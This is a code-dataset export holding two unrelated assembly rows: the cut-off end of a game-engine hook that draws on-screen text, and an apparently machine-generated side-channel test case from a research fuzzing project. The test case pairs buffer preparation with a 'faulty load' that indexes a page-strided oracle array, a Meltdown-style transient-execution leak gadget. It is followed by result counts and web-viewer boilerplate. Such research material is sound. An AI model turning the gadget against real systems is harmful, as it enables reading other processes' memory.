push dword ptr ss:[ebp+28h]
push dword ptr ss:[ebp+24h]
push dword ptr ss:[ebp+20h]
push dword ptr ss:[ebp+1ch]
push dword ptr ss:[ebp+18h]
push dword ptr ss:[ebp+14h]
push dword ptr ss:[ebp+10h]
push dword ptr ss:[ebp+0ch]
push dword ptr ss:[ebp+8h]
call dword ptr ds:[ori_vmmain]
add esp,34h
; Save eax so we don't corrupt it.
push eax
; Move the player struct into eax and then compare it to an active player.
mov eax,dword ptr ss:[ebp+8h]
cmp eax,4h
jnz short @nactive
; eng_textout( unknown, unknown, 0, unknown, color_3f, text, unknown, 0, 0)
; eax holds a reference to the player struct.
push 0
push 0
push 40e00000h
lea eax,text
push eax
lea eax,colour
push eax
push 3f800000h
push 0
push 42c80000h
push 42c80000h
call dword ptr ds:[eng_textout]
add esp,24h
; Restore eax and the stack.
@nactive:
pop eax
pop ebp
retn
end main | 25.575 | 100 | 0.668866 |
cff75599621f4b528685e760284201b25c5691d2 | 8,012 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_21829_1706.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_21829_1706.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_21829_1706.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r8
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x18ed7, %r11
nop
nop
nop
nop
and $48464, %r8
mov $0x6162636465666768, %rdx
movq %rdx, %xmm0
vmovups %ymm0, (%r11)
nop
add $36515, %rbp
lea addresses_D_ht+0xe82f, %rsi
lea addresses_UC_ht+0x4c51, %rdi
clflush (%rsi)
add $49541, %rbp
mov $86, %rcx
rep movsw
nop
nop
nop
nop
add %rcx, %rcx
lea addresses_WC_ht+0x9db7, %rsi
lea addresses_WC_ht+0xcb51, %rdi
nop
inc %rbp
mov $0, %rcx
rep movsb
nop
nop
nop
xor $24104, %rdi
lea addresses_WC_ht+0x14951, %rdx
nop
nop
lfence
movw $0x6162, (%rdx)
lfence
lea addresses_D_ht+0x6f31, %r11
nop
and %rsi, %rsi
movb (%r11), %cl
nop
nop
nop
add %rdi, %rdi
lea addresses_WC_ht+0x3ba1, %r11
nop
nop
nop
nop
xor $14018, %rcx
mov (%r11), %di
nop
nop
nop
add $24870, %rsi
lea addresses_normal_ht+0x12151, %rdx
nop
nop
xor $55358, %r8
mov (%rdx), %r11d
nop
nop
nop
xor $65141, %r8
lea addresses_A_ht+0x16551, %rcx
nop
nop
nop
nop
nop
sub %r11, %r11
mov $0x6162636465666768, %rsi
movq %rsi, (%rcx)
nop
nop
add %rsi, %rsi
lea addresses_A_ht+0xd551, %rdi
nop
nop
nop
nop
nop
dec %rbp
vmovups (%rdi), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $0, %xmm2, %rcx
nop
nop
sub $43403, %rbp
lea addresses_normal_ht+0x6d51, %r8
nop
nop
nop
nop
nop
inc %rdx
vmovups (%r8), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %rdi
cmp %rbp, %rbp
lea addresses_UC_ht+0x1b651, %rsi
lea addresses_normal_ht+0x1954d, %rdi
nop
nop
nop
nop
cmp $45387, %r13
mov $85, %rcx
rep movsw
nop
nop
and $20433, %rdi
lea addresses_A_ht+0x6d51, %rcx
nop
nop
nop
and %rdi, %rdi
movb $0x61, (%rcx)
nop
nop
cmp $20529, %r8
lea addresses_UC_ht+0x1e4b1, %r11
nop
nop
nop
add %rsi, %rsi
movups (%r11), %xmm1
vpextrq $1, %xmm1, %r13
nop
nop
sub %rcx, %rcx
lea addresses_WT_ht+0x16de9, %rsi
lea addresses_D_ht+0xd151, %rdi
nop
nop
nop
nop
nop
add $22862, %rbp
mov $109, %rcx
rep movsl
nop
nop
cmp %r11, %r11
lea addresses_UC_ht+0x11051, %rsi
nop
nop
nop
nop
nop
cmp $31431, %r11
movw $0x6162, (%rsi)
nop
dec %rdx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r8
pop %r13
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r8
push %r9
push %rcx
// Store
lea addresses_D+0x739, %r13
nop
nop
nop
nop
and $19790, %rcx
mov $0x5152535455565758, %r11
movq %r11, (%r13)
nop
nop
nop
nop
nop
sub %r12, %r12
// Faulty Load
lea addresses_WT+0x17d51, %r8
nop
nop
and %r13, %r13
movb (%r8), %r9b
lea oracles, %r8
and $0xff, %r9
shlq $12, %r9
mov (%r8,%r9,1), %r9
pop %rcx
pop %r9
pop %r8
pop %r13
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_WT', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 3, 'NT': False, 'type': 'addresses_D', 'size': 8, 'AVXalign': False}}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_WT', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_A_ht', 'size': 32, 'AVXalign': False}}
{'src': {'type': 'addresses_D_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': True}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 4, 'NT': True, 'type': 'addresses_D_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_normal_ht', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': True, 'type': 'addresses_A_ht', 'size': 8, 'AVXalign': False}}
{'src': {'same': True, 'congruent': 11, 'NT': False, 'type': 'addresses_A_ht', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_normal_ht', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 10, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_UC_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 8, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_UC_ht', 'size': 2, 'AVXalign': False}}
{'39': 21829}
39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39
*/
| 32.569106 | 2,999 | 0.656141 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.